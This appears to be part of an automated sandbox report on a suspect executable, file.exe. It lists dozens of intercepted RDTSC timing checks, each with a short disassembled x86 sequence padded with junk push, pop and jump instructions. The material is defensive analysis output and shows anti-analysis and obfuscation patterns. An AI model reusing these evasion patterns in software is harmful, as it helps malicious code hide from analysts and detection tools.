Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104E10 second address: 1104E34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edx, 5773ED2Fh 0x0000000f push 0000001Eh 0x00000011 add dword ptr [ebp+1245D3E3h], edx 0x00000017 mov edi, dword ptr [ebp+122D3A56h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104E34 second address: 1104E46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104E46 second address: 1104E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110521D second address: 1105284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jo 00007FD648C0B446h 0x00000011 popad 0x00000012 jmp 00007FD648C0B452h 0x00000017 popad 0x00000018 nop 0x00000019 add di, 6D72h 0x0000001e lea eax, dword ptr [ebp+12498BC4h] 0x00000024 movzx edx, ax 0x00000027 nop 0x00000028 push esi 0x00000029 jmp 00007FD648C0B456h 0x0000002e pop esi 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD648C0B457h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1105284 second address: 11052C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648BC9AD9h 0x00000008 jmp 00007FD648BC9ACFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add dl, 0000004Ah 0x00000014 lea eax, dword ptr [ebp+12498B80h] 0x0000001a nop 0x0000001b jng 00007FD648BC9ACEh 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11052C6 second address: 11052D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11052D2 second address: 11052D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11052D8 second address: 11052DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11052DF second address: 10DFC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD648BC9AC8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 call 00007FD648BC9AD3h 0x00000027 push eax 0x00000028 mov ecx, 4A9302A8h 0x0000002d pop edi 0x0000002e pop ecx 0x0000002f mov dword ptr [ebp+122D2D84h], edx 0x00000035 call dword ptr [ebp+122D2B55h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD648BC9ACBh 0x00000042 push ecx 0x00000043 jno 00007FD648BC9AC6h 0x00000049 pop ecx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB19B second address: 10AB19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB19F second address: 10AB1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB1A5 second address: 10AB1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FD648C0B455h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB1C4 second address: 10AB1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E482 second address: 113E499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E784 second address: 113E788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E788 second address: 113E78C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E78C second address: 113E792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E792 second address: 113E797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147652 second address: 1147673 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD648BC9ACFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FD648BC9AC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146139 second address: 1146157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FD648C0B452h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11462A1 second address: 11462AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11462AA second address: 11462B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146763 second address: 1146768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146768 second address: 1146793 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD648C0B450h 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11468EB second address: 11468FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146CD3 second address: 1146CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147515 second address: 1147519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E39 second address: 1145E43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E43 second address: 1145E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E47 second address: 1145E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E4D second address: 1145E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACDh 0x00000009 jnl 00007FD648BC9AC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E64 second address: 1145E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FD648C0B457h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145E89 second address: 1145E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FD648BC9AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AC06 second address: 114AC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AC0C second address: 114AC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A5CE second address: 114A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A5D2 second address: 114A5D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A749 second address: 114A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A74D second address: 114A760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A760 second address: 114A786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD648C0B45Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD648C0B452h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A8D1 second address: 114A8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A8D5 second address: 114A8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A8EF second address: 114A910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FD648BC9AC8h 0x00000012 pushad 0x00000013 jmp 00007FD648BC9ACAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A910 second address: 114A922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FD648C0B446h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114CBA1 second address: 114CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150540 second address: 1150544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150544 second address: 1150554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150554 second address: 115055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115055E second address: 11505A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FD648BC9AD9h 0x0000000f jc 00007FD648BC9ACEh 0x00000015 jg 00007FD648BC9AC6h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD648BC9AD8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11505A8 second address: 11505AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115070A second address: 115070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11569A8 second address: 11569B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FD648C0B446h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155497 second address: 11554B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007FD648BC9AC6h 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007FD648BC9AC6h 0x00000017 pushad 0x00000018 popad 0x00000019 jc 00007FD648BC9AC6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11554B8 second address: 11554C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FD648C0B446h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155607 second address: 115565D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD648BC9AD6h 0x00000008 jmp 00007FD648BC9AD0h 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007FD648BC9ADCh 0x0000001a jmp 00007FD648BC9AD6h 0x0000001f jmp 00007FD648BC9AD8h 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155910 second address: 1155930 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648C0B446h 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155930 second address: 1155946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155946 second address: 1155965 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FD648C0B455h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104BE5 second address: 1104C56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FD648BC9AD3h 0x0000000d mov dword ptr [ebp+122D2B03h], esi 0x00000013 pop ecx 0x00000014 mov ebx, dword ptr [ebp+12498BBFh] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FD648BC9AC8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 add eax, ebx 0x00000036 sub ecx, 0D1C026Fh 0x0000003c mov ecx, dword ptr [ebp+122D1A5Fh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FD648BC9AD2h 0x00000049 jnc 00007FD648BC9ACCh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104C56 second address: 1104C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD648C0B448h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104DF9 second address: 1104DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104DFD second address: 1104E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007FD648C0B446h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155DA3 second address: 1155DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FD648BC9AC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115AD78 second address: 115AD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B164 second address: 115B168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B168 second address: 115B1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD648C0B451h 0x0000000f push ebx 0x00000010 jnc 00007FD648C0B446h 0x00000016 pop ebx 0x00000017 jmp 00007FD648C0B453h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B1B4 second address: 115B1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B302 second address: 115B308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B308 second address: 115B30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B30E second address: 115B31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B31B second address: 115B31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B31F second address: 115B323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11632F7 second address: 1163301 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1163301 second address: 1163311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161515 second address: 116151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116151E second address: 1161522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161522 second address: 1161526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161865 second address: 1161883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B458h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161883 second address: 1161887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161887 second address: 11618A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648C0B446h 0x00000008 jmp 00007FD648C0B44Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11618A1 second address: 11618C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD5h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jne 00007FD648BC9AC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11618C8 second address: 11618CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11618CD second address: 11618D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD648BC9ACCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161BAC second address: 1161BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 jmp 00007FD648C0B456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161BE2 second address: 1161BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161BE8 second address: 1161BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD648C0B450h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161BFE second address: 1161C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161C09 second address: 1161C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD648C0B446h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161ED9 second address: 1161F0D instructions: 0x00000000 rdtsc 0x00000002 je 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jne 00007FD648BC9ADBh 0x00000012 push edi 0x00000013 jmp 00007FD648BC9ACAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162212 second address: 1162218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162218 second address: 1162239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648BC9AD3h 0x0000000b js 00007FD648BC9AC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11624C4 second address: 11624D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FD648C0B446h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
